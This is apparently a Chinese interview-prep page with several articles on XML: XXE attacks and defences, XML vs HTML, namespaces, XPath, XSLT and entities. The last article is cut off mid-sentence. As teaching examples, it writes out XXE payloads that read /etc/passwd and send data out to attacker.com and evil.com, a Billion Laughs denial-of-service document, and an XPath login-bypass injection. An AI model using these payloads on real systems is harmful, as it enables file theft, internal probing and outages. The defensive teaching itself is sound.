计算机基础面试题手册

梳理高频技术问题，帮助你按主题复习和查漏补缺。

计算机基础阅读 05月28日 03:50

XXE 攻击原理与防护：从 XML 注入到实战防御

XML 解析器天生就会处理 DTD 中的外部实体引用——这个设计初衷是为了方便模块化文档管理，却被攻击者利用来读取服务器文件、发起内网请求，甚至执行代码。这就是 XXE（XML External Entity）攻击的核心原理。2025 年 6 月，Apache Tika 爆出 CVE-2025-66516（CVSS 8.4），攻击者通过上传恶意 PDF 文件触发 XXE，读取服务器敏感文件——这说明 XXE 不是历史遗留问题，至今仍有新的攻击面被挖掘出来。XXE 攻击是怎么发生的XML 规范允许在 DTD（文档类型定义）中声明实体，其中 SYSTEM 类型的实体会让解析器去访问指定的 URI：<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>解析器在处理 &xxe; 时，会读取 /etc/passwd 的内容并替换进去。如果应用把解析结果返回给用户，敏感文件内容就泄露了。哪怕应用不回显解析结果，攻击者依然可以通过外带（OOB）方式获取数据：<!DOCTYPE data [ <!ENTITY xxe SYSTEM "http://attacker.com/collect?data=SECRET">]>或者利用盲 XXE 通过响应时间差异来推断信息。哪些场景容易中招不是只有"接收 XML 参数的 API"才需要担心。以下场景都可能成为 XXE 的入口：SOAP Web Service：SOAP 消息本身就是 XML，如果后端没有安全配置解析器，直接沦陷文件上传功能：SVG 图片、DOCX/PPTX 文档、XLSX 表格底层都是 XML 格式，上传恶意文件就可能触发 XXESSO/SAML：SAML 断言是 XML 格式，身份认证流程中的 XXE 可能导致认证绕过RSS/Atom 订阅：聚合外部 RSS 源时，恶意 RSS 中的 XML 实体可能被解析三种 XML 注入攻击类型XXE（XML 外部实体注入）最常见、危害最大。上面已经展示了攻击方式。核心危害包括：读取服务器任意文件（file:// 协议）发起 SSRF 攻击（http:// 协议探测内网）拒绝服务（Billion Laughs 攻击，通过实体嵌套指数级膨胀 XML 体积）在特定环境下远程代码执行（如 PHP expect 协议）XML 标签注入攻击者通过注入 XML 标签修改文档结构，篡改业务逻辑：<user><name>John</name></user><user><name>John</name><role>admin</role></user>这类攻击的关键是应用直接把用户输入拼接到 XML 文档中，没有做转义或结构校验。XPath 注入类似 SQL 注入的思路，针对 XPath 查询：// 正常查询//user[username='john' and password='secret']// 注入后：绕过密码验证//user[username='john' or '1'='1' and password='anything']防护方案1. 禁用 DTD 和外部实体（最关键）这是防护 XXE 的根本措施。不同语言的配置方式不同：Java：DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);dbf.setXIncludeAware(false);dbf.setExpandEntityReferences(false);disallow-doctype-decl 设为 true 会直接拒绝包含 DTD 的 XML，这是最严格的防护。如果业务必须使用 DTD，至少要禁用外部实体（后面三个 false）。Python（lxml）：from lxml import etreeparser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)tree = etree.parse("data.xml", parser=parser)no_network=True 阻止解析器发起网络请求，切断 SSRF 攻击面。PHP（8.0+）：// PHP 8.0 起 libxml_disable_entity_loader() 已废弃// 正确做法：使用 LIBXML_NOENT 标志配合内部实体处理$dom = new DOMDocument();$dom->loadXML($xmlString, LIBXML_NONET);LIBXML_NONET 禁止网络访问，替代了已废弃的 libxml_disable_entity_loader()。.NET：XmlReaderSettings settings = new XmlReaderSettings();settings.DtdProcessing = DtdProcessing.Prohibit; // 禁止 DTDsettings.XmlResolver = null; // 禁止解析外部实体XmlReader reader = XmlReader.Create(stream, settings);2. 输入验证在解析之前，先检查 XML 中是否包含危险结构：public boolean isSafeXML(String xml) { String upper = xml.toUpperCase(); return !upper.contains("<!DOCTYPE") && !upper.contains("<!ENTITY");}注意：输入验证是辅助手段，不能替代解析器安全配置。攻击者可能通过编码、注释等方式绕过字符串检测。3. 使用 JSON 替代 XML如果业务允许，直接用 JSON 代替 XML 作为数据交换格式。JSON 不支持实体和 DTD，从根本上消除了 XXE 风险。对于 REST API 来说，这通常是最简单的解决方案。4. XPath 注入防护：参数化查询和 SQL 注入用参数化查询一样，XPath 也支持变量绑定：XPathFactory factory = XPathFactory.newInstance();XPath xpath = factory.newXPath();xpath.setXPathVariableResolver(varName -> { switch (varName) { case "username": return username; case "password": return password; default: return null; }});XPathExpression expr = xpath.compile("//user[username=$username and password=$password]");5. XML Schema 验证用 XSD 约束 XML 文档的结构，拒绝不符合预期的输入：SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);Schema schema = sf.newSchema(new File("schema.xsd"));DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();dbf.setSchema(schema);dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);Schema 验证既防标签注入，也限制了 XML 的结构和内容。6. 最小权限运行即使 XXE 攻击成功，如果应用进程没有读取敏感文件的权限，攻击者也只能拿到低权限数据。容器化部署、只读文件系统、网络策略限制外联，都是纵深防御的一环。Billion Laughs 攻击：一种特殊的拒绝服务这种攻击利用实体嵌套让 XML 体积指数级膨胀：<?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">]><root>&lol4;</root>&lol4; 展开后约 10 亿个 lol，轻松耗尽内存。防护方式同样是禁用 DTD——上面提到的解析器配置已经覆盖了这个场景。检测和排查Burp Suite：拦截请求，手动注入 XXE payload 测试OWASP ZAP：自动化扫描 XXE 漏洞SonarQube：静态代码分析，检测不安全的 XML 解析配置XXEinjector：专门针对 XXE 的自动化检测工具，支持 OOB 和 Blind XXE在 CI/CD 流程中集成 SAST 工具扫描 XML 解析相关代码，可以在部署前就发现风险配置。

计算机基础阅读 05月28日 03:49

XML 和 HTML 有什么区别？

XML 和 HTML 都是标记语言，但定位完全不同：HTML 是用来显示网页内容的，标签全预定义；XML 是用来存储和传输数据的，标签可以自己定义。面试中抓住"设计目的""标签定义""语法严格性"三个核心差异展开就够。一段代码看清区别：<h1>用户信息</h1><p>姓名：张三</p><user> <name>张三</name> <age>28</age></user>同样的"用户信息"，HTML 关心怎么在页面上展示，XML 关心数据本身的含义和层级关系。这个根本分歧决定了两者在语法、结构、应用场景上的所有差异。追问XML 和 HTML 的语法严格性有什么具体区别？XML 严格得多，根本原因在于两者的容错需求不同。HTML 要容错——网页打不开用户就直接走了，所以浏览器会尽可能猜测意图并渲染。XML 传数据——格式错了数据就不可信了，所以解析器遇到错误直接报停。具体规则对比：| 规则 | XML | HTML ||------|-----|------|| 标签关闭 | 必须关闭，自闭合写 <br/> | <p> <br> 可不关 || 大小写 | 区分，<Name> ≠ <name> | 不区分 || 属性引号 | 必须加 | 有时可省 || 根元素 | 有且仅有一个 | 允许多个（不推荐）|| 嵌套 | 必须严格正确嵌套 | 允许部分错误嵌套 |面试时说出"容错需求不同导致语法严格性不同"这个根本原因，比单纯背规则更体现理解深度。DTD 和 XML Schema 是什么？有什么区别？两者都约束 XML 文档结构——哪些标签能出现、顺序如何、数据类型是什么。DTD 是早期方案，语法简单但功能有限：不支持数据类型定义（只能区分 PCDATA 和 CDATA）、不支持命名空间、用的不是 XML 语法本身。XML Schema（XSD）更强大：支持 string/integer/date 等丰富数据类型、命名空间避免标签冲突、正则约束，而且 XSD 本身就是 XML 格式写的，可以用 XML 工具链处理。实际项目优先用 XSD，DTD 基本只在维护遗留系统时遇到。实际项目里 XML 还常用吗？Web 开发中 XML 的使用确实在下降，但远没到淘汰的程度：Spring 的 bean 配置、Maven 的 pom.xml、Android 的布局文件和 AndroidManifest.xml、SVG 矢量图、Office 文档格式（.docx/.xlsx 本质是 ZIP 包裹的 XML）——这些你日常都在用。新项目的数据接口基本都改用 JSON 了，但 XML 在配置文件和文档格式领域仍有不可替代的位置。安全方面有个高频考点：XXE 漏洞（XML 外部实体注入）——攻击者通过 <!ENTITY xxe SYSTEM "file:///etc/passwd"> 读取服务器文件，防护方式是解析器禁用外部实体。XML 和 JSON 相比各有什么优劣？JSON 轻量、解析快、和 JavaScript 天然亲和，是 Web API 主流。XML 的优势在于：属性和嵌套两种信息表达方式（<user id="1"><name>张三</name></user> 里 id 是属性、name 是子元素，JSON 没有这种区分）、成熟的 schema 验证（XSD）、命名空间避免标签冲突（SOAP 消息里 <soap:Body> 和 <wsa:Action> 共存）、注释和元数据更丰富。需要严格验证和复杂结构选 XML，追求轻量和速度选 JSON。一个实用判断：配置文件和文档格式选 XML，API 数据交换选 JSON。

计算机基础阅读 05月28日 03:48

什么是 XML 命名空间，如何声明和使用它？

当两个不同的 XML 词汇表使用相同的元素名时，解析器无法区分它们——这就是命名冲突。XML 命名空间（Namespace）正是为解决这个问题而设计的机制，它通过为元素和属性绑定一个全局唯一的 URI 标识符，让同名元素可以和平共处。为什么需要命名空间假设一份文档同时引用了两个 XML 词汇表，两者都定义了 <table> 元素：一个表示表格数据，另一个表示家具。没有命名空间时，解析器无法判断 <table> 到底指哪个。命名空间通过在元素前加前缀并绑定唯一 URI 来消除歧义。需要注意的是，命名空间 URI 仅作为唯一标识符使用，解析器不会去访问这个地址。URI 选择 URL 格式只是惯例，并非强制——任何合法的 URI 都可以，包括 URN。命名空间的声明语法命名空间使用 xmlns 属性声明，有两种形式：<root xmlns:prefix="namespaceURI"> <prefix:element>内容</prefix:element></root><root xmlns="namespaceURI"> <element>内容</element></root>关键规则：xmlns 是保留属性名，专门用于命名空间声明前缀是自定义的简短别名，遵循 XML 名称命名规则以 xml（任何大小写组合）开头的前缀被保留，不能自定义URI 必须用引号包裹，通常使用 URL 格式默认命名空间 vs 带前缀的命名空间| 特性 | 默认命名空间 | 带前缀的命名空间 ||------|------------|----------------|| 声明方式 | xmlns="URI" | xmlns:prefix="URI" || 适用范围 | 未加前缀的元素 | 使用该前缀的元素和属性 || 是否适用于属性 | 不适用 | 适用 || 典型场景 | 文档中只有一种词汇表 | 文档混合多种词汇表 |一个重要区别：默认命名空间不适用于属性。未加前缀的属性永远属于无命名空间，即使所在元素有默认命名空间。如果属性需要属于某个命名空间，必须使用带前缀的声明。<book xmlns="http://example.com/books" xmlns:dc="http://purl.org/dc/elements/1.1/">   <title dc:title="主标题">XML 入门</title></book>命名空间的作用域命名空间声明在声明它的元素及其所有后代元素中有效，遵循以下规则：继承：子元素自动继承祖先元素的命名空间声明覆盖：子元素可以重新声明同名前缀，新的绑定在子元素范围内生效无命名空间：如果元素没有前缀且没有默认命名空间，它属于"无命名空间"<root xmlns:a="http://example.com/a"> <a:child>  <a:grandchild xmlns:a="http://example.com/b">  </a:grandchild> </a:child></root>命名空间在实际协议中的应用SOAP 消息SOAP 协议是命名空间应用的典型场景，一条 SOAP 消息同时使用 SOAP 信封命名空间和业务数据命名空间：<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.com/stock"> <soap:Header> <m:Authentication> <m:Username>user</m:Username> <m:Password>pass</m:Password> </m:Authentication> </soap:Header> <soap:Body> <m:GetStockPrice> <m:StockSymbol>IBM</m:StockSymbol> </m:GetStockPrice> </soap:Body></soap:Envelope>soap 前缀标识协议层元素，m 前缀标识业务数据元素，两者互不干扰。XML Schema（XSD）XSD 本身大量使用命名空间，xs 或 xsd 前缀是 XSD 元素的通用约定：<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="book" type="xs:string"/></xs:schema>在 XSD 验证中，命名空间决定了类型定义和元素声明的归属。目标命名空间（targetNamespace）指定了该 Schema 定义的所有组件属于哪个命名空间。常见错误与陷阱前缀声明但未使用：声明了 xmlns:foo 却从未使用 foo: 前缀，虽然不会报错，但说明声明是多余的默认命名空间不覆盖属性：这是最常见的误解，未加前缀的属性不属于默认命名空间URI 相等性：命名空间比较是字符串精确匹配，http://example.com 和 http://example.com/ 是两个不同的命名空间在根元素上声明所有命名空间：虽然合法，但只在需要时声明可以让文档更清晰混用不同前缀绑定同一 URI：合法但容易混淆，同一文档中应保持前缀一致最佳实践使用公司域名的 URL 格式作为 URI，确保全球唯一前缀选择简短且有意义，如 xs 表示 XML Schema，xhtml 表示 XHTML在文档的根元素集中声明所有需要的命名空间，方便维护同一文档中对同一命名空间始终使用相同前缀只在确实存在命名冲突风险时才引入命名空间，避免不必要的复杂性追问Q: 命名空间 URI 是否必须是一个可访问的 URL？不是。URI 仅作为标识符，解析器不会尝试访问它。使用 URL 格式只是行业惯例，因为它天然具备全局唯一性。实际开发中，这个地址可能根本不存在。Q: 默认命名空间和没有命名空间有什么区别？有默认命名空间的元素属于该命名空间；没有前缀且没有默认命名空间的元素属于"无命名空间"。这是两个不同的状态——属于某个命名空间和不属于任何命名空间在 XSD 验证中表现完全不同。

计算机基础阅读 05月28日 03:48

XPath 是什么？XML 数据查询从入门到实战

XPath 是 XML 世界里的"查询语言"——你有一堆结构化的 XML 数据，想从中精确提取某个节点的值、过滤满足条件的元素、或者统计某个属性出现的次数，XPath 就是干这个的。几乎所有需要处理 XML 的场景都会用到它：Java 解析配置文件、Python 爬虫提取网页数据、XSLT 转换文档格式，底层都依赖 XPath 定位节点。如果把 XML 文档比作一栋大楼，那 XPath 就是楼里的导航系统——告诉你"3 楼东侧第二个房间"在哪，而不是让你挨个门去找。XPath 把 XML 看成一棵树拿到一份 XML 文档后，XPath 要做的第一件事是把它当成一棵"节点树"。每种 XML 组成部分对应一种节点类型：元素节点：XML 中的标签，比如 <book>属性节点：标签里的属性，比如 category="web"文本节点：标签之间的文字内容文档节点：整份 XML 的根，也叫根节点剩下的命名空间节点、处理指令节点、注释节点用得少，知道就行。关键理解一点：XPath 的所有查询操作，本质上都是在"在这棵树上找路"。路径表达式：XPath 的基本语法拿一份常见的 XML 举例：<bookstore> <book category="web"> <title lang="en">XML Guide</title> <author>John Doe</author> <price>39.95</price> </book> <book category="database"> <title lang="en">SQL Basics</title> <author>Jane Smith</author> <price>29.99</price> </book></bookstore>绝对路径和相对路径/bookstore → 根元素 bookstore/bookstore/book → bookstore 下所有 book 子元素//book → 文档中任意位置的 book 元素bookstore//book → bookstore 后代中所有 book 元素/ 开头是绝对路径，从根节点出发；// 表示"不管在哪一层，只要匹配就选出来"，类似文件系统的递归搜索。一个性能细节：//book 看起来方便，但它会遍历整棵树，文档大的时候性能开销明显。如果知道节点的大致位置，用 /bookstore/book 这种更精确的路径更快。谓词：加条件过滤谓词写在方括号 [] 里，用来筛选满足特定条件的节点。可以把谓词理解为 SQL 的 WHERE 子句——都是给查询加过滤条件：/bookstore/book[1] → 第一个 book/bookstore/book[last()] → 最后一个 book/bookstore/book[position()<3] → 前两个 book//book[@category='web'] → category 属性为 web 的 book//book[price>35] → price 大于 35 的 book实际开发中大部分 XPath 查询都离不开谓词。一个实用技巧：多个条件可以用 and/or 组合，比如 //book[@category='web' and price<40]。通配符* → 任何元素节点@* → 任何属性节点node() → 任何类型的节点用得不多，但在写通用查询时很方便，比如 //book/* 取出 book 下所有子元素，不用逐个写子元素名称。轴：指定搜索方向轴定义了"从当前节点往哪个方向找"。默认轴是 child，所以 /bookstore/book 其实是 /child::bookstore/child::book 的简写。常用的轴：parent → 父节点（简写 ..）child → 所有子节点（默认，可省略）descendant → 所有后代节点ancestor → 所有祖先节点following-sibling → 之后的同级节点preceding-sibling → 之前的同级节点self → 自身（简写 .）完整语法是轴名::节点测试，比如 ancestor::book 表示找所有叫 book 的祖先节点。日常开发中 parent、child、descendant、following-sibling 这几个占了 90% 的使用场景。内置函数：让查询更灵活XPath 内置了一批函数，可以直接在谓词和表达式中调用。字符串函数——出场率最高contains(title, 'XML') → title 包含 "XML"starts-with(@lang, 'en') → lang 属性以 "en" 开头substring(price, 1, 4) → 截取 price 的前 4 个字符normalize-space(text) → 去掉多余空白string-length(title) → 标题长度contains 是日常开发中出场率最高的函数，做模糊匹配全靠它。一个常见场景：在配置文件里找所有包含特定关键字的节点。聚合和数值函数count(//book) → 统计 book 元素数量sum(//book/price) → 所有 price 求和floor(3.7) → 3（向下取整）ceiling(3.2) → 4（向上取整）round(3.5) → 4（四舍五入）布尔函数not(@category='web') → category 不是 webboolean(//book) → 是否存在 book 元素（判空用）boolean() 配合 not() 可以判断"某个节点是否存在"，在做数据校验时很有用。在各语言中实际使用 XPathJavaXPathFactory factory = XPathFactory.newInstance();XPath xpath = factory.newXPath();DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();Document doc = dbf.newDocumentBuilder().parse(new File("books.xml"));// 查询单个值String title = xpath.evaluate("//book[@category='web']/title/text()", doc);// 查询节点列表NodeList books = (NodeList) xpath.evaluate("//book", doc, XPathConstants.NODESET);for (int i = 0; i < books.getLength(); i++) { Element book = (Element) books.item(i); System.out.println(book.getAttribute("category"));}踩坑提醒：Java 默认的 XPath 实现是串行执行的，大文件查询会很慢。如果性能敏感，考虑换用 Saxon-HE 等第三方实现。另外，DocumentBuilderFactory.newInstance() 默认不启用命名空间支持，需要 dbf.setNamespaceAware(true) 才能用命名空间相关的 XPath 查询。Python（lxml 库）from lxml import etreetree = etree.parse("books.xml")# 提取文本titles = tree.xpath("//book[@category='web']/title/text()")# 提取属性categories = tree.xpath("//book/@category")# 用函数做统计total = sum(tree.xpath("//book/price/text()"))Python 爬虫中 lxml + XPath 是黄金组合，比 BeautifulSoup 的 CSS 选择器更灵活——尤其是处理不规则的 HTML 结构，XPath 的 contains() 和轴查询能解决很多 CSS 选择器搞不定的问题。JavaScript（浏览器环境）const parser = new DOMParser();const xmlDoc = parser.parseFromString(xmlString, "text/xml");const result = xmlDoc.evaluate( "//book[@category='web']/title", xmlDoc, null, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);for (let i = 0; i < result.snapshotLength; i++) { console.log(result.snapshotItem(i).textContent);}浏览器环境下的 document.evaluate 可以直接对 HTML DOM 执行 XPath 查询，不限于 XML 文档。做自动化测试或油猴脚本时很实用。XPath 和 XQuery 的关系XQuery 基于 XPath 构建，但能力更强：XPath：定位和选择节点，是"找东西"的工具XQuery：不仅能找，还能构造新的 XML 结构、做 FLWOR 查询（类似 SQL 的 for-let-where-order-return）如果只是从 XML 里提取数据，XPath 够用。如果需要查询后重新组织输出格式，才需要 XQuery。常见坑和最佳实践命名空间陷阱——新手第一大坑XML 声明了命名空间后，直接用 /root/child 可能查不到节点。比如：<root xmlns="http://example.com/ns"> <child>hello</child></root>此时 //child 返回空，因为 child 已经属于一个命名空间了。必须在代码中注册命名空间前缀，然后用前缀查询：# Python lxml 示例tree.xpath("//ns:child/text()", namespaces={"ns": "http://example.com/ns"})这是 XPath 新手最常遇到的"明明节点在，就是查不到"的问题。// 的性能问题前面说过，// 会遍历全树。几百 KB 的文档无所谓，几十 MB 的文档就会明显卡顿。能写精确路径就别用 //，尤其是循环里反复执行 XPath 的时候。文本节点的空白陷阱XML 中的换行和缩进会被解析为文本节点，//text() 可能返回一大堆空白字符串。用 normalize-space() 过滤，或者直接用 /text() 取特定层级的文本。XPath 1.0 vs 2.0/3.0大多数语言内置的是 XPath 1.0，不支持 for 循环、条件表达式（if-then-else）、正则匹配等 2.0+ 特性。需要高级功能时：Java → 用 Saxon 替换默认实现Python → lxml 的扩展函数，或换用 xml.etree.ElementTree 的有限 XPath 支持C# → .NET 3.5+ 支持 XPath 1.0，更高级需要第三方库特殊字符转义路径中包含单引号或双引号时，需要用 concat() 拼接，比如 //book[title=concat("He said '", "'", "s book")]。XPath 1.0 没有原生的转义语法，这是它的一个设计缺陷。XPath 2.0+ 支持双引号内转义单引号，但 1.0 环境下只能用 concat() 绕路。查询结果缓存如果同一条 XPath 会被反复执行（比如在循环里），考虑编译一次、重复执行：// Java 编译 XPath 表达式XPathExpression expr = xpath.compile("//book[@category='web']");NodeList result = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);编译一次比每次都 evaluate() 快得多，尤其是复杂表达式。

计算机基础阅读 05月28日 03:47

XSLT 是什么？XML 转换的模板匹配机制详解

XSLT 经常被误解为"XML 的 CSS"——其实它更像一门函数式编程语言。你写一系列模板规则，XSLT 处理器拿着这些规则去匹配 XML 节点，匹配上了就输出对应内容。理解这个模型，比背语法重要得多。XSLT 处理模型：模板驱动的递归匹配XSLT 的核心不是"写一个程序去遍历 XML"，而是"告诉处理器遇到什么节点就输出什么"。处理器从根节点开始，按模板优先级逐级匹配，遇到 apply-templates 就递归处理子节点。这个过程有几个关键规则：匹配优先级：更具体的匹配规则优先。match="bookstore/book" 比 match="*" 优先级高内置模板：如果你没写匹配某节点的模板，XSLT 有默认行为——继续递归处理子节点，文本节点直接输出内容。这就是为什么你只写了部分模板，其他内容也会"冒出来"一次匹配：一个节点只会被优先级最高的模板处理一次<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">  <xsl:template match="/"> <html> <body> <xsl:apply-templates select="bookstore/book"/> </body> </html> </xsl:template>  <xsl:template match="book"> <p><xsl:value-of select="title"/> - <xsl:value-of select="author"/></p> </xsl:template></xsl:stylesheet>apply-templates 和 for-each 都能遍历节点，但区别很重要：apply-templates 把控制权交给模板匹配机制，天然支持递归和模块化；for-each 是命令式的，所有逻辑都写在一个块里。简单遍历用 for-each 没问题，但一旦逻辑复杂，模板匹配更好维护。XPath：XSLT 的导航语言XSLT 离不开 XPath。你在 select 属性里写的表达式就是 XPath，它决定了"从 XML 里取什么数据"。几个高频用法：| XPath 表达式 | 含义 ||---|---|| /bookstore/book | 从根节点选取所有 book || //book | 任意层级的 book 节点 || book[@category='web'] | category 属性为 web 的 book || book[position() > 1] | 第二本书开始（下标从 1 计） || count(//book) | book 节点数量 |一个容易踩的坑：//book 看起来方便，但它在整个文档树中搜索，大数据量下性能很差。能写绝对路径 /bookstore/book 就不要用 //。条件判断和循环if 和 chooseXSLT 1.0 没有 else，只有 xsl:if。需要多分支判断时用 choose/when/otherwise：<xsl:template match="book"> <div> <xsl:choose> <xsl:when test="price &gt; 30"> <xsl:attribute name="class">expensive</xsl:attribute> </xsl:when> <xsl:when test="price &gt; 20"> <xsl:attribute name="class">moderate</xsl:attribute> </xsl:when> <xsl:otherwise> <xsl:attribute name="class">cheap</xsl:attribute> </xsl:otherwise> </xsl:choose> <xsl:value-of select="title"/> - $<xsl:value-of select="price"/> </div></xsl:template>注意 XML 里的比较运算符要用转义：> 写成 &gt;，< 写成 &lt;。初学者经常在这卡住。for-each 和排序<xsl:for-each select="bookstore/book"> <xsl:sort select="price" order="ascending" data-type="number"/> <p><xsl:value-of select="title"/> - $<xsl:value-of select="price"/></p></xsl:for-each>sort 必须紧跟在 for-each 或 apply-templates 后面，放在其他位置会被忽略——而且不会报错。变量和参数变量（不可变）XSLT 的变量一旦赋值就不能修改，这是函数式编程的特征：<xsl:variable name="maxPrice" select="100"/><xsl:variable name="bookCount" select="count(//book)"/>想实现"累加计数"？不能靠修改变量，得用递归模板或者 sum() 等 XPath 聚合函数。这是从命令式语言转过来的开发者最容易不适应的地方。参数（模板间传值）<xsl:template name="formatPrice"> <xsl:param name="price"/> <xsl:param name="currency" select="'$'"/> <xsl:value-of select="concat($currency, format-number($price, '#,##0.00'))"/></xsl:template><xsl:call-template name="formatPrice"> <xsl:with-param name="price" select="price"/> <xsl:with-param name="currency" select="'€'"/></xsl:call-template>模板模式：同一节点不同输出同一个 XML 节点，你可能在不同位置需要不同的输出形式。mode 属性解决这个需求：<xsl:template match="book" mode="summary"> <li><xsl:value-of select="title"/></li></xsl:template><xsl:template match="book" mode="detail"> <div class="book-detail"> <h3><xsl:value-of select="title"/></h3> <p>Author: <xsl:value-of select="author"/></p> <p>Price: $<xsl:value-of select="price"/></p> </div></xsl:template><ul><xsl:apply-templates select="book" mode="summary"/></ul><div><xsl:apply-templates select="book" mode="detail"/></div>key：XSLT 的"索引"用 xsl:key 可以实现类似数据库索引的效果，最常用于分组（XSLT 1.0 没有 group-by，得用 Muenchian 分组法）：<xsl:key name="books-by-author" match="book" use="author"/><xsl:for-each select="bookstore/book[count(. | key('books-by-author', author)[1]) = 1]"> <h2><xsl:value-of select="author"/></h2> <ul> <xsl:for-each select="key('books-by-author', author)"> <li><xsl:value-of select="title"/></li> </xsl:for-each> </ul></xsl:for-each>Muenchian 分组的写法确实反直觉。如果你可以用 XSLT 2.0+，直接用 xsl:for-each-group 就行，省掉这些弯弯绕绕。在不同语言中执行 XSLT 转换JavaTransformerFactory factory = TransformerFactory.newInstance();Transformer transformer = factory.newTransformer( new StreamSource(new File("transform.xsl")));transformer.transform( new StreamSource(new File("data.xml")), new StreamResult(new File("output.html")));注意 TransformerFactory.newInstance() 会按特定顺序查找实现，如果 classpath 里有 Saxon 等第三方实现，可能拿到的不是 JDK 内置的 Xalan。生产环境建议显式指定：TransformerFactory factory = TransformerFactory.newInstance( "net.sf.saxon.TransformerFactoryImpl", null);Python（lxml）from lxml import etreexml_doc = etree.parse("data.xml")xslt_doc = etree.parse("transform.xsl")transform = etree.XSLT(xslt_doc)result = transform(xml_doc)lxml 的 XSLT 只支持 1.0。需要 2.0/3.0 特性的话，得用 saxonc 库调用 Saxon-HE。浏览器端浏览器曾经原生支持 XSLT（XSLTProcessor），但现在已经不推荐在前端做转换了——性能差、调试难、XSLT 1.0 功能有限。现代做法是在构建阶段或服务端完成转换。XSLT 1.0 vs 2.0 vs 3.0| 特性 | 1.0 | 2.0 | 3.0 ||---|---|---|---|| 分组 | Muenchian 分组（复杂） | for-each-group | for-each-group || 正则 | 不支持 | xsl:analyze-string | xsl:analyze-string || 函数定义 | 不支持 | xsl:function | xsl:function || 多输出 | 不支持 | xsl:result-document | xsl:result-document || 包机制 | 不支持 | 不支持 | xsl:use-package || try/catch | 不支持 | 不支持 | xsl:try |XSLT 1.0 是浏览器唯一支持的版本。服务端处理建议至少用 2.0，分组和函数定义这两个特性就能省掉大量代码。实战踩坑字符编码问题：转换输出中文乱码，通常是因为没有指定 xsl:output 的 encoding 属性，或者输出文件的编码和声明不一致。加上 <xsl:output method="html" encoding="UTF-8"/> 基本能解决。命名空间冲突：源 XML 带了默认命名空间（如 xmlns="http://example.com"），你写的模板死活匹配不上。XSLT 里命名空间必须显式匹配，不能用空命名空间去匹配有命名空间的节点。解决方法是给命名空间加前缀：xpath-default-amespace="http://example.com"（2.0+），或者在 1.0 里手动声明前缀并使用。大文件内存溢出：XSLT 处理器默认把整个 XML 加载到内存。几十 MB 的 XML 文件可能直接 OOM。Saxon-EE 的流式处理（streaming）可以解决这个问题，但社区版（HE）不支持。XSLT 的学习曲线主要卡在思维方式的转换——从命令式的"怎么做"切换到声明式的"要什么"。理解了模板匹配的递归模型，剩下的语法只是工具。

计算机基础阅读 05月28日 03:47

XML 实体详解：4 种类型与 XXE 攻击防护

XML 文档里有些内容会反复出现——公司名、版权声明、版本号，每次手写既麻烦又容易改漏。XML 实体就是解决这个问题的：定义一次，到处引用。但实体的能力不止于此，外部实体还能引入其他文件的内容，而这个特性恰恰成了 XXE 攻击的入口。实体是什么实体（Entity）本质是一个"文本替身"——你在 DTD 里声明它代表什么，文档里用 &实体名; 引用它，解析器会自动替换成实际内容。<!DOCTYPE config [ <!ENTITY app "订单系统"> <!ENTITY ver "2.3.1">]><config> <name>&app;</name> <version>&ver;</version></config>解析后 &app; 变成"订单系统"，&ver; 变成"2.3.1"。改一处定义，所有引用自动更新。四种实体类型内部实体值直接写在 DTD 里的实体，适合复用短文本：<!DOCTYPE letter [ <!ENTITY sender "张三"> <!ENTITY closing "此致敬礼">]><letter> <body>&sender; 申请退款</body> <footer>&closing;</footer></letter>内部实体没有安全风险，放心用。外部实体引用外部文件的内容，SYSTEM 关键字指向文件路径：<!DOCTYPE book [ <!ENTITY ch1 SYSTEM "chapter1.xml"> <!ENTITY ch2 SYSTEM "chapter2.xml">]><book> &ch1; &ch2;</book>外部实体方便模块化管理，但也带来了 XXE 注入风险——后面详说。参数实体只在 DTD 内部使用的实体，用 % 声明和引用：<!DOCTYPE catalog [ <!ENTITY % basic " <!ELEMENT title (#PCDATA)> <!ELEMENT price (#PCDATA)> "> %basic;]>参数实体的核心用途是拆分和复用 DTD 片段。当 DTD 声明很长时，把公共部分抽成参数实体，多个 DTD 共享同一份定义。预定义实体XML 自带 5 个，转义特殊字符，不需要声明：| 实体 | 字符 | 用在哪 ||------|------|--------|| &lt; | < | 标签符号不能直接写 || &gt; | > | 同上 || &amp; | & | 实体引用符号本身 || &apos; | ' | 属性值用单引号时 || &quot; | " | 属性值用双引号时 |<condition>5 &lt; 10</condition><msg>She said &quot;done&quot;</msg>XXE 攻击：外部实体的安全隐患外部实体能读文件，这个能力如果被攻击者利用，后果很严重。攻击原理攻击者构造包含恶意外部实体的 XML：<!DOCTYPE data [ <!ENTITY steal SYSTEM "file:///etc/passwd">]><data>&steal;</data>服务器解析这段 XML 时，&steal; 会被替换成 /etc/passwd 的文件内容。如果这个内容被返回给客户端，攻击者就拿到了服务器的敏感文件。更危险的是参数实体版本的盲注 XXE——不直接回显内容，而是把数据外带发送到攻击者的服务器：<!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % dtd SYSTEM "http://evil.com/collect.dtd"> %dtd;]>collect.dtd 里可以定义把 %file; 内容拼进 URL 请求参数，实现数据外泄。防护方案Java（最严格，直接禁用 DTD）：DocumentBuilderFactory dbf = 